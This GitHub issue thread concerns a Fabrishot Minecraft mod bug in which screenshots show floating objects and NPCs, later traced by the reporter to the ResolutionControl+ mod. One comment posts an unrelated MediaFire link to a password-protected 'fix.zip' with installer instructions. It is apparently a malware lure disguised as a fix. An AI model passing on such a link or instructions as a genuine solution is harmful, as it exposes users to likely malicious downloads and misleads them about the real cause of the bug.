### ISSUE TITLE
Screenshots have objects and npcs floating about

### ISSUE THREAD

**Issue by madoptics** [ramidzkh/fabrishot#94]
Fabrishot version: 1.10.1
Minecraft version: 1.20.1

Regular shot (F2):
![2024-08-28_13 52 11](https://github.com/user-attachments/assets/7e1d652d-6ec9-4cef-829e-102881dec17e)

Fabrishot:
![huge_2024-08-28_13 52 07](https://github.com/user-attachments/assets/2ae0ca69-c40a-4c15-9504-e5fc8dfed8e6)

Is it because I'm using an older version? I couldn't use the latest yet as I'm also using the Create mod that's still stuck in mc 1.20.1. Any help would be great. Thanks!

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by madoptics** [comment]
Finally found the culprit, ResolutionControl+ mod, removing it solves the issue! 

Thanks for fabrishot btw, you guys are awesome! 😊
